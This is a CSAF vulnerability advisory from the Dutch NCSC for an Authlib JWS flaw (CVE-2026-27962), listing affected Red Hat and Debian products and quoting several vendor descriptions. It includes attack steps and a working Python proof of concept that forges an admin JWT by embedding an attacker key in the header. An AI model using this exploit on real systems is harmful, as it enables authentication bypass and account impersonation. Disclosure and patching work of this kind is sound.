{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-27962", "tracking": { "current_release_date": "2026-03-25T02:32:55.226386Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-27962", "initial_release_date": "2026-03-16T16:03:33.637948Z", "revision_history": [ { "date": "2026-03-16T16:03:33.637948Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-16T16:03:42.721096Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-16T18:28:21.287122Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-16T18:28:23.931952Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-16T18:38:34.671263Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-16T18:38:40.002401Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-16T19:38:53.731066Z", "number": "7", "summary": "Unknown change." }, { "date": "2026-03-16T22:50:59.086705Z", "number": "8", "summary": "References created (1)." }, { "date": "2026-03-17T00:28:03.810849Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (30).| Product Identifiers created (5).| References created (5).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-17T00:28:18.148691Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-17T00:44:04.817151Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| Products connected (2)." }, { "date": "2026-03-17T00:44:14.722759Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-17T04:38:39.519409Z", "number": "13", "summary": "Unknown change." }, { "date": "2026-03-17T06:43:41.478488Z", "number": "14", "summary": "Description created for source." }, { "date": "2026-03-17T07:35:17.587694Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-03-17T13:38:48.687406Z", "number": "16", "summary": "Unknown change." }, { "date": "2026-03-17T15:04:52.419994Z", "number": "17", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-17T15:04:59.802602Z", "number": "18", "summary": "NCSC Score updated." }, { "date": "2026-03-17T21:28:19.667767Z", "number": "19", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-17T21:28:21.794558Z", "number": "20", "summary": "NCSC Score updated." }, { "date": "2026-03-19T00:36:49.308150Z", "number": "21", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (11).| Product Remediations created (2).| Product Identifiers created (24).| Product Identifiers removed (24).| References created (21).| CWES updated (1)." }, { "date": "2026-03-19T00:36:54.259982Z", "number": "22", "summary": "NCSC Score updated." }, { "date": "2026-03-19T15:28:34.144064Z", "number": "23", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)." }, { "date": "2026-03-20T09:39:17.966612Z", "number": "24", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:39:20.686506Z", "number": "25", "summary": "NCSC Score updated." }, { "date": "2026-03-25T00:31:34.421998Z", "number": "26", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (11).| Product Remediations created (2).| Product Identifiers created (18).| Product Identifiers removed (18).| References created (21).| CWES updated (1)." } ], "status": "interim", "version": "26" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<1.6.9", "product": { "name": "vers:unknown/<1.6.9", "product_id": "CSAFPID-5830119", "product_identification_helper": { "cpe": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "Authlib" } ], "category": "vendor", "name": "Authlib" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5474797", "product_identification_helper": { "cpe": "cpe:/a:redhat:lightspeed_core" } } } ], "category": "product_name", "name": "Lightspeed Core" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1439279", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_ai" } } } ], "category": "product_name", "name": "Red Hat OpenShift AI (RHOAI)" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3", "product": { "name": "vers:rpm/3", "product_id": "CSAFPID-1441200", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3" } } } ], "category": "product_name", "name": "Red Hat Quay 3" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3.10", "product": { "name": "vers:rpm/3.10", "product_id": "CSAFPID-5209636", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3.10::el8" } } } ], "category": "product_name", "name": "Red Hat Quay 3.1" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3.12", "product": { "name": "vers:rpm/3.12", "product_id": "CSAFPID-5256659", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3.12::el8" } } } ], "category": "product_name", "name": "Red Hat Quay 3.12" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1772054192", "product": { "name": "vers:oci/1772054192", "product_id": "CSAFPID-5846431", "product_identification_helper": { "purl": "pkg:oci/clair-rhel8@sha256%3Ad547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772054192" } } }, { "category": "product_version_range", "name": "vers:oci/1772725047", "product": { "name": "vers:oci/1772725047", "product_id": "CSAFPID-5903533", "product_identification_helper": { "purl": "pkg:oci/clair-rhel8@sha256%3Ad59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f?arch=s390x&repository_url=registry.redhat.io/quay&tag=1772725047" } } } ], "category": "product_name", "name": "clair-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773765999", "product": { "name": "vers:oci/1773765999", "product_id": "CSAFPID-5846432", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773765999" } } }, { "category": "product_version_range", "name": "vers:oci/1774022278", "product": { "name": "vers:oci/1774022278", "product_id": "CSAFPID-5903534", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774022278" } } } ], "category": "product_name", "name": "quay-bridge-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773765477", "product": { "name": "vers:oci/1773765477", "product_id": "CSAFPID-5846433", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Af15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d?arch=arm64&repository_url=registry.redhat.io/quay&tag=1773765477" } } }, { "category": "product_version_range", "name": "vers:oci/1774021704", "product": { "name": "vers:oci/1774021704", "product_id": "CSAFPID-5903535", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Afe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774021704" } } } ], "category": "product_name", "name": "quay-bridge-operator-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1772132933", "product": { "name": "vers:oci/1772132933", "product_id": "CSAFPID-5846434", "product_identification_helper": { "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3Ac3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee?arch=amd64&repository_url=registry.redhat.io/quay&tag=1772132933" } } }, { "category": "product_version_range", "name": "vers:oci/1772739218", "product": { "name": "vers:oci/1772739218", "product_id": "CSAFPID-5903536", "product_identification_helper": { "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99?arch=amd64&repository_url=registry.redhat.io/quay&tag=1772739218" } } } ], "category": "product_name", "name": "quay-builder-qemu-rhcos-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1772054202", "product": { "name": "vers:oci/1772054202", "product_id": "CSAFPID-5846435", "product_identification_helper": { "purl": "pkg:oci/quay-builder-rhel8@sha256%3A821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772054202" } } }, { "category": "product_version_range", "name": "vers:oci/1772726823", "product": { "name": "vers:oci/1772726823", "product_id": "CSAFPID-5903537", "product_identification_helper": { "purl": "pkg:oci/quay-builder-rhel8@sha256%3Aba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772726823" } } } ], "category": "product_name", "name": "quay-builder-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773766026", "product": { "name": "vers:oci/1773766026", "product_id": "CSAFPID-5846436", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773766026" } } }, { "category": "product_version_range", "name": "vers:oci/1774022275", "product": { "name": "vers:oci/1774022275", "product_id": "CSAFPID-5903538", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774022275" } } } ], "category": "product_name", "name": "quay-container-security-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773765467", "product": { "name": "vers:oci/1773765467", "product_id": "CSAFPID-5846437", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aa5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773765467" } } }, { "category": "product_version_range", "name": "vers:oci/1774021695", "product": { "name": "vers:oci/1774021695", "product_id": "CSAFPID-5903539", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aedd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942?arch=s390x&repository_url=registry.redhat.io/quay&tag=1774021695" } } } ], "category": "product_name", "name": "quay-container-security-operator-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773775889", "product": { "name": "vers:oci/1773775889", "product_id": "CSAFPID-5846438", "product_identification_helper": { "purl": "pkg:oci/quay-operator-bundle@sha256%3Af4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773775889" } } }, { "category": "product_version_range", "name": "vers:oci/1774022285", "product": { "name": "vers:oci/1774022285", "product_id": "CSAFPID-5903540", "product_identification_helper": { "purl": "pkg:oci/quay-operator-bundle@sha256%3Ae165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774022285" } } } ], "category": "product_name", "name": "quay-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773761676", "product": { "name": "vers:oci/1773761676", "product_id": "CSAFPID-5846439", "product_identification_helper": { "purl": "pkg:oci/quay-operator-rhel8@sha256%3Add1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1?arch=arm64&repository_url=registry.redhat.io/quay&tag=1773761676" } } }, { "category": "product_version_range", "name": "vers:oci/1774021722", "product": { "name": "vers:oci/1774021722", "product_id": "CSAFPID-5903541", "product_identification_helper": { "purl": "pkg:oci/quay-operator-rhel8@sha256%3Ade004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774021722" } } } ], "category": "product_name", "name": "quay-operator-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773771962", "product": { "name": "vers:oci/1773771962", "product_id": "CSAFPID-5846430", "product_identification_helper": { "purl": "pkg:oci/quay-rhel8@sha256%3Ae39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773771962" } } }, { "category": "product_version_range", "name": "vers:oci/1773971077", "product": { "name": "vers:oci/1773971077", "product_id": "CSAFPID-5903532", "product_identification_helper": { "purl": "pkg:oci/quay-rhel8@sha256%3Af6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773971077" } } } ], "category": "product_name", "name": "quay-rhel8" } ], "category": "product_family", "name": "Red Hat Quay" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/6", "product": { "name": "vers:rpm/6", "product_id": "CSAFPID-1439313", "product_identification_helper": { "cpe": "cpe:/a:redhat:satellite:6" } } } ], "category": "product_name", "name": "Red Hat Satellite 6" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222639" } } ], "category": "product_name", "name": "foreman-mcp-server-rhel9" } ], "category": "product_family", "name": "Red Hat Satellite 6" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2831634" } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5035448" } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel9" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5474798" } } ], "category": "product_name", "name": "lightspeed-stack-rhel9" } ], "category": "product_family", "name": "Lightspeed Core" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5811359" } } ], "category": "product_name", "name": "odh-mlflow-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068100" } } ], "category": "product_name", "name": "odh-pipeline-runtime-datascience-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068103" } } ], "category": "product_name", "name": "odh-pipeline-runtime-minimal-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068105" } } ], "category": "product_name", "name": "odh-pipeline-runtime-pytorch-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222767" } } ], "category": "product_name", "name": "odh-pipeline-runtime-pytorch-llmcompressor-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068108" } } ], "category": "product_name", "name": "odh-pipeline-runtime-pytorch-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068110" } } ], "category": "product_name", "name": "odh-pipeline-runtime-tensorflow-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5155537" } } ], "category": "product_name", "name": "odh-pipeline-runtime-tensorflow-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068114" } } ], "category": "product_name", "name": "odh-workbench-codeserver-datascience-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068116" } } ], "category": "product_name", "name": "odh-workbench-jupyter-datascience-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068119" } } ], "category": "product_name", "name": "odh-workbench-jupyter-minimal-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068121" } } ], "category": "product_name", "name": "odh-workbench-jupyter-minimal-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068123" } } ], "category": "product_name", "name": "odh-workbench-jupyter-minimal-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068126" } } ], "category": "product_name", "name": "odh-workbench-jupyter-pytorch-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222780" } } ], "category": "product_name", "name": "odh-workbench-jupyter-pytorch-llmcompressor-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068128" } } ], "category": "product_name", "name": "odh-workbench-jupyter-pytorch-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068131" } } ], "category": "product_name", "name": "odh-workbench-jupyter-tensorflow-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5155538" } } ], "category": "product_name", "name": "odh-workbench-jupyter-tensorflow-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068134" } } ], "category": "product_name", "name": "odh-workbench-jupyter-trustyai-cpu-py312-rhel9" } ], "category": "product_family", "name": "Red Hat OpenShift AI (RHOAI)" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1455906" } } ], "category": "product_name", "name": "quay-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5355695" } } ], "category": "product_name", "name": "quay-rhel9" } ], "category": "product_family", "name": "Red Hat Quay 3" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1405217" } } ], "category": "product_name", "name": "python-authlib" } ], "category": "product_family", "name": "bookworm" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:deb/unknown", "product": { "name": "vers:deb/unknown", "product_id": "CSAFPID-1405218" } } ], "category": "product_name", "name": "python-authlib" } ], "category": "product_family", "name": "bullseye" } ], "category": "vendor", "name": "Debian" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-27962", "cwe": { "id": "CWE-347", "name": "Improper Verification of Cryptographic Signature" }, "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "CSAFPID-5846431", "CSAFPID-5846432", "CSAFPID-5846433", "CSAFPID-5846434", "CSAFPID-5846435", "CSAFPID-5846436", "CSAFPID-5846437", "CSAFPID-5846438", "CSAFPID-5846439", "CSAFPID-5903533", "CSAFPID-5903534", "CSAFPID-5903535", "CSAFPID-5903536", "CSAFPID-5903537", "CSAFPID-5903538", "CSAFPID-5903539", "CSAFPID-5903540", "CSAFPID-5903541" ] } ], "notes": [ { "category": "description", "text": "## Description\n\n### Summary\n\nA JWK Header Injection vulnerability in `authlib`'s JWS implementation allows an unauthenticated\nattacker to forge arbitrary JWT tokens that pass signature verification. When `key=None` is passed\nto any JWS deserialization function, the library extracts and uses the cryptographic key embedded\nin the attacker-controlled JWT `jwk` header field. An attacker can sign a token with their own\nprivate key, embed the matching public key in the header, and have the server accept the forged\ntoken as cryptographically valid — bypassing authentication and authorization entirely.\n\nThis behavior violates **RFC 7515 §4.1.3** and the validation algorithm defined in **RFC 7515 §5.2**.\n\n### Details\n\n**Vulnerable file:** `authlib/jose/rfc7515/jws.py` \n**Vulnerable method:** `JsonWebSignature._prepare_algorithm_key()` \n**Lines:** 272–273\n\n```python\nelif key is None and \"jwk\" in header:\n key = header[\"jwk\"] # ← attacker-controlled key used for verification\n```\n\nWhen `key=None` is passed to `jws.deserialize_compact()`, `jws.deserialize_json()`, or\n`jws.deserialize()`, the library checks the JWT header for a `jwk` field. If present, it extracts\nthat value — which is fully attacker-controlled — and uses it as the verification key.\n\n**RFC 7515 violations:**\n\n- **§4.1.3** explicitly states the `jwk` header parameter is **\"NOT RECOMMENDED\"** because keys\n embedded by the token submitter cannot be trusted as a verification anchor.\n- **§5.2 (Validation Algorithm)** specifies the verification key MUST come from the *application\n context*, not from the token itself. There is no step in the RFC that permits falling back to\n the `jwk` header when no application key is provided.\n\n**Why this is a library issue, not just a developer mistake:**\n\nThe most common real-world trigger is a **key resolver callable** used for JWKS-based key lookup.\nA developer writes:\n\n```python\ndef lookup_key(header, payload):\n kid = header.get(\"kid\")\n return jwks_cache.get(kid) # returns None when kid is unknown/rotated\n\njws.deserialize_compact(token, lookup_key)\n```\n\nWhen an attacker submits a token with an unknown `kid`, the callable legitimately returns `None`.\nThe library then silently falls through to `key = header[\"jwk\"]`, trusting the attacker's embedded\nkey. The developer never wrote `key=None` — the library's fallback logic introduced it. The result\nlooks like a verified token with no exception raised, making the substitution invisible.\n\n**Attack steps:**\n\n1. Attacker generates an RSA or EC keypair.\n2. Attacker crafts a JWT payload with any desired claims (e.g. `{\"role\": \"admin\"}`).\n3. Attacker signs the JWT with their **private** key.\n4. Attacker embeds their **public** key in the JWT `jwk` header field.\n5. Attacker uses an unknown `kid` to cause the key resolver to return `None`.\n6. The library uses `header[\"jwk\"]` for verification — signature passes.\n7. Forged claims are returned as authentic.\n\n### PoC\n\nTested against **authlib 1.6.6** (HEAD `a9e4cfee`, Python 3.11).\n\n**Requirements:**\n```\npip install authlib cryptography\n```\n\n**Exploit script:**\n```python\nfrom authlib.jose import JsonWebSignature, RSAKey\nimport json\n\njws = JsonWebSignature([\"RS256\"])\n\n# Step 1: Attacker generates their own RSA keypair\nattacker_private = RSAKey.generate_key(2048, is_private=True)\nattacker_public_jwk = attacker_private.as_dict(is_private=False)\n\n# Step 2: Forge a JWT with elevated privileges, embed public key in header\nheader = {\"alg\": \"RS256\", \"jwk\": attacker_public_jwk}\nforged_payload = json.dumps({\"sub\": \"attacker\", \"role\": \"admin\"}).encode()\nforged_token = jws.serialize_compact(header, forged_payload, attacker_private)\n\n# Step 3: Server decodes with key=None — token is accepted\nresult = jws.deserialize_compact(forged_token, None)\nclaims = json.loads(result[\"payload\"])\nprint(claims) # {'sub': 'attacker', 'role': 'admin'}\nassert claims[\"role\"] == \"admin\" # PASSES\n```\n\n**Expected output:**\n```\n{'sub': 'attacker', 'role': 'admin'}\n```\n\n**Docker (self-contained reproduction):**\n```bash\nsudo docker run --rm authlib-cve-poc:latest \\\n python3 /workspace/pocs/poc_auth001_jws_jwk_injection.py\n```\n\n### Impact\n\nThis is an authentication and authorization bypass vulnerability. Any application using authlib's\nJWS deserialization is affected when:\n\n- `key=None` is passed directly, **or**\n- a key resolver callable returns `None` for unknown/rotated `kid` values (the common JWKS lookup pattern)\n\nAn unauthenticated attacker can impersonate any user or assume any privilege encoded in JWT claims\n(admin roles, scopes, user IDs) without possessing any legitimate credentials or server-side keys.\nThe forged token is indistinguishable from a legitimate one — no exception is raised.\n\nThis is a violation of **RFC 7515 §4.1.3** and **§5.2**. The spec is unambiguous: the `jwk`\nheader parameter is \"NOT RECOMMENDED\" as a key source, and the validation key MUST come from\nthe application context, not the token itself.\n\n**Minimal fix** — remove the fallback from `authlib/jose/rfc7515/jws.py:272-273`:\n```python\n# DELETE:\nelif key is None and \"jwk\" in header:\n key = header[\"jwk\"]\n```\n\n**Recommended safe replacement** — raise explicitly when no key is resolved:\n```python\nif key is None:\n raise MissingKeyError(\"No key provided and no valid key resolvable from context.\")\n```", "title": "github - https://github.com/advisories/GHSA-wvwj-cvrp-7pv5" }, { "category": "description", "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27962" }, { "category": "description", "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27962" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.\nThis IMPORTANT vulnerability in Authlib's JWS implementation allows unauthenticated attackers to forge JWTs by embedding their own cryptographic key in the token header. Red Hat products including Ansible Automation Platform, Quay, and OpenShift AI are affected when configured to use key=None during JWS deserialization. Impact is high to confidentiality and integrity as attackers can bypass authentication and authorization.", "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-27962" }, { "category": "description", "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-27962" }, { "category": "description", "text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.", "title": "redhat - https://access.redhat.com/errata/RHSA-2026:4942" }, { "category": "description", "text": "## Description\n\n### 